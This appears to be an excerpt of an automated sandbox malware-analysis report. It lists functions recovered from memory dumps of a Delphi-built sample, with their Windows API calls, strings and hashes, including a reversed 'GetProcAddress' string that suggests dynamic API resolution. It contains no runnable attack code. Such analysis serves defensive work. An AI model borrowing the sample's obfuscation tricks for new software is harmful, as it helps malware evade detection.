                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LocalTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 481472006-0
                                                                                                                    • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                    • Instruction ID: 6792351bb08f269a0e44a9d8acb7a83e3f0ec02b8e1c2bf8f785eacc16048be1
                                                                                                                    • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                    • Instruction Fuzzy Hash: 25A01250404860418A4033180C0253430449810A20FC4878078F8403D0E91D452081E3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6bfb175fb32393fe8673b248012d6a464aeaca16444a5f0bf0953634ee1108b5
                                                                                                                    • Instruction ID: e8e6bdc578135efa98f2885282c841d0f9388acd101bdd8f76f4552d47466f2a
                                                                                                                    • Opcode Fuzzy Hash: 6bfb175fb32393fe8673b248012d6a464aeaca16444a5f0bf0953634ee1108b5
                                                                                                                    • Instruction Fuzzy Hash: 19D1787192E3CA8FDB135B3488352857F319E9B30475A45D3F0858F7A7E6284D1ACBA2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                    • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                    • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                    • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02D9D29D
                                                                                                                      • Part of subcall function 02D9D268: GetProcAddress.KERNEL32(00000000), ref: 02D9D281
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                    • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                    • API String ID: 1646373207-1918263038
                                                                                                                    • Opcode ID: 7d07a3c13261286f1eac8abac49f239f903ab51463f09a9a1e76b064c8db6708
                                                                                                                    • Instruction ID: 34568ece07d5a68623b4e749bf68aa432c6542766bbafd765408f45a4c10a124
                                                                                                                    • Opcode Fuzzy Hash: 7d07a3c13261286f1eac8abac49f239f903ab51463f09a9a1e76b064c8db6708
                                                                                                                    • Instruction Fuzzy Hash: AF4106B1AD93085B5F187A6E7500427B7DFD749B147E0862BF4098B784EA30FC92CA79
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02DA6EDE
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02DA6EEF
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02DA6EFF
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02DA6F0F
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02DA6F1F
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02DA6F2F
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02DA6F3F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                    • API String ID: 667068680-2233174745
                                                                                                                    • Opcode ID: b0dae3a6009d96837efa8d7ed6458baabde6be9e5ca0ebe87691b659dd2f8f3e
                                                                                                                    • Instruction ID: 8234e854911209a357aa7ca5eeec2f72645003db2437934af6ca0e63f60ff954
                                                                                                                    • Opcode Fuzzy Hash: b0dae3a6009d96837efa8d7ed6458baabde6be9e5ca0ebe87691b659dd2f8f3e
                                                                                                                    • Instruction Fuzzy Hash: E5F04CF2A8C3C0EDBF01BB716CA5C66275DE525604B482C95B90356786E775DC188FE0
                                                                                                                    APIs
                                                                                                                    • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02D928CE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message
                                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                    • API String ID: 2030045667-32948583
                                                                                                                    • Opcode ID: b98259e8c62f5a43edc6e038600a49923145ce7e00144a5aaa7430f8ecebc42f
                                                                                                                    • Instruction ID: 3ec56bbe937314de173853cf533988ce587f981e95e91668138863c573b42fe7
                                                                                                                    • Opcode Fuzzy Hash: b98259e8c62f5a43edc6e038600a49923145ce7e00144a5aaa7430f8ecebc42f
                                                                                                                    • Instruction Fuzzy Hash: 9BA1C530A04294AFDF21AA2CCC88BD976E5EB09350F1441E5FD49AB385CB758D89CF61
                                                                                                                    Strings
                                                                                                                    • Unexpected Memory Leak, xrefs: 02D928C0
                                                                                                                    • 7, xrefs: 02D926A1
                                                                                                                    • , xrefs: 02D92814
                                                                                                                    • The unexpected small block leaks are:, xrefs: 02D92707
                                                                                                                    • An unexpected memory leak has occurred. , xrefs: 02D92690
                                                                                                                    • bytes: , xrefs: 02D9275D
                                                                                                                    • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02D92849
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                    • API String ID: 0-2723507874
                                                                                                                    • Opcode ID: c6086a7407cb42b1a050c603592f294ada2529b363e736c15cbd25f34310e2d6
                                                                                                                    • Instruction ID: b9a08a9132b7936c40d5ff56af2c122dbe037e3bf052b2b5e4808cffea62633b
                                                                                                                    • Opcode Fuzzy Hash: c6086a7407cb42b1a050c603592f294ada2529b363e736c15cbd25f34310e2d6
                                                                                                                    • Instruction Fuzzy Hash: 3971B430A04298AFDF21AB2CCC88BD9B6E5EB09714F1041E5F949A7381DB758DC5CF61
                                                                                                                    APIs
                                                                                                                    • GetThreadLocale.KERNEL32(00000000,02D9C08B,?,?,00000000,00000000), ref: 02D9BDF6
                                                                                                                      • Part of subcall function 02D9A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D9A7E2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                    • API String ID: 4232894706-2493093252
                                                                                                                    • Opcode ID: 2723cdefa4fe4befb786b96b7d23fdb37a69969bd4f3f63cd272b93b4e2e1a32
                                                                                                                    • Instruction ID: e58c752f38e27c2c4adfac8907bcd01f1deea9855f814e6f1f15e9fb079855ca
                                                                                                                    • Opcode Fuzzy Hash: 2723cdefa4fe4befb786b96b7d23fdb37a69969bd4f3f63cd272b93b4e2e1a32
                                                                                                                    • Instruction Fuzzy Hash: C5613C35B602489BDF00EBA4D850A9FB7BBDB88304F609836B105AB345DA39DD46CF75
                                                                                                                    APIs
                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 02DAB000
                                                                                                                    • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02DAB017
                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 02DAB0AB
                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000002), ref: 02DAB0B7
                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 02DAB0CB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Read$HandleModule
                                                                                                                    • String ID: KernelBase$LoadLibraryExA
                                                                                                                    • API String ID: 2226866862-113032527
                                                                                                                    • Opcode ID: 7da72b575541ff5d4a404bb494bebc525c64958c8b3ff8c0588f30a39b1766ba
                                                                                                                    • Instruction ID: edd6b98e104a15031bc33b7d85af169d0b491eff5b7b844f673421b41ae872c9
                                                                                                                    • Opcode Fuzzy Hash: 7da72b575541ff5d4a404bb494bebc525c64958c8b3ff8c0588f30a39b1766ba
                                                                                                                    • Instruction Fuzzy Hash: 1F315EB1A40205ABDB20DB69CC96F6A77A8EF16358F104555FA24EB3C0D370ED51CBA4
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D94423,?,?,02E167C8,?,?,02DBE7A8,02D965B1,02DBD30D), ref: 02D94395
                                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D94423,?,?,02E167C8,?,?,02DBE7A8,02D965B1,02DBD30D), ref: 02D9439B
                                                                                                                    • GetStdHandle.KERNEL32(000000F5,02D943E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D94423,?,?,02E167C8), ref: 02D943B0
                                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,02D943E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D94423,?,?), ref: 02D943B6
                                                                                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02D943D4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileHandleWrite$Message
                                                                                                                    • String ID: Error$Runtime error at 00000000
                                                                                                                    • API String ID: 1570097196-2970929446
                                                                                                                    • Opcode ID: 3f9026fc5849f8a9805a1228ad6ee5ea796378be882c1b08ea49faf392b39757
                                                                                                                    • Instruction ID: 1cd3d28096e60237142d43ad0d83f0efbb485241908cd72027652ffad243796f
                                                                                                                    • Opcode Fuzzy Hash: 3f9026fc5849f8a9805a1228ad6ee5ea796378be882c1b08ea49faf392b39757
                                                                                                                    • Instruction Fuzzy Hash: 1FF0F670AC4300B5FF11A6B07C06F99239C8704F11F900615B359667D2C7E48CC9CB22
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02D9AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D9AD59
                                                                                                                      • Part of subcall function 02D9AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02D9AD7D
                                                                                                                      • Part of subcall function 02D9AD3C: GetModuleFileNameA.KERNEL32(02D90000,?,00000105), ref: 02D9AD98
                                                                                                                      • Part of subcall function 02D9AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02D9AE2E
                                                                                                                    • CharToOemA.USER32(?,?), ref: 02D9AEFB
                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02D9AF18
                                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02D9AF1E
                                                                                                                    • GetStdHandle.KERNEL32(000000F4,02D9AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02D9AF33
                                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,02D9AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02D9AF39
                                                                                                                    • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02D9AF5B
                                                                                                                    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02D9AF71
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 185507032-0
                                                                                                                    • Opcode ID: a198bed0990c4f155f5ef5946243959fdb4bffc96d035a53acae209d83c5fbdd
                                                                                                                    • Instruction ID: f6707ab7884fae815d333a40dacc8646029726dc7faa320c70ad59402e661a09
                                                                                                                    • Opcode Fuzzy Hash: a198bed0990c4f155f5ef5946243959fdb4bffc96d035a53acae209d83c5fbdd
                                                                                                                    • Instruction Fuzzy Hash: 54112AB2588200BADB00FFA4DC85F9B77EDEB45700F804A65B754D62E0DA75ED448BB2
                                                                                                                    APIs
                                                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02D9E625
                                                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02D9E641
                                                                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02D9E67A
                                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02D9E6F7
                                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02D9E710
                                                                                                                    • VariantCopy.OLEAUT32(?,00000000), ref: 02D9E745
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 351091851-0
                                                                                                                    • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                    • Instruction ID: f4939affb736649a70b03418cd589951cb0d84c3695f56fd838d66d067a0b99a
                                                                                                                    • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                    • Instruction Fuzzy Hash: 3151F7759012299BCF62EB58C980BD9B3BDEF49300F4045D6FA08E7312DA30AF858F61
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D935BA
                                                                                                                    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02D93609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D935ED
                                                                                                                    • RegCloseKey.ADVAPI32(?,02D93610,00000000,?,00000004,00000000,02D93609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D93603
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                    • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                    • API String ID: 3677997916-4173385793
                                                                                                                    • Opcode ID: 3b7c0b4aba30866d26b6bdecf72e6f00425baa982866c7222c27dfed95d94f42
                                                                                                                    • Instruction ID: 2cae4391a1863a40d61b695cfb39e717eb6548d7b9206fb1368c3533a0bcc8af
                                                                                                                    • Opcode Fuzzy Hash: 3b7c0b4aba30866d26b6bdecf72e6f00425baa982866c7222c27dfed95d94f42
                                                                                                                    • Instruction Fuzzy Hash: 9B01B175944258FAEF11EBD0DD02BBD77ECDB08B00F6045A2BA04D7780E674AE14CA69
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 02DA82D9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: Kernel32$sserddAcorPteG
                                                                                                                    • API String ID: 667068680-1372893251
                                                                                                                    • Opcode ID: 2fce90ccc9f31b70f62eea0d45e0a7387e86c85bfa059fd2c4ecd7080a67225d
                                                                                                                    • Instruction ID: 69c438eb176d5fa5f049914b5e366ee7b4cef872f697371db0e24ada63bcc9f0
                                                                                                                    • Opcode Fuzzy Hash: 2fce90ccc9f31b70f62eea0d45e0a7387e86c85bfa059fd2c4ecd7080a67225d
                                                                                                                    • Instruction Fuzzy Hash: C3014F75684344BFEB00EFA4EC51E9EB7EEEB49B00F918460B800D7741D670AE41DA64
                                                                                                                    APIs
                                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,02D9AAE7,?,?,00000000), ref: 02D9AA68
                                                                                                                      • Part of subcall function 02D9A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D9A7E2
                                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02D9AAE7,?,?,00000000), ref: 02D9AA98
                                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02D9AAA3
                                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02D9AAE7,?,?,00000000), ref: 02D9AAC1
                                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02D9AACC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
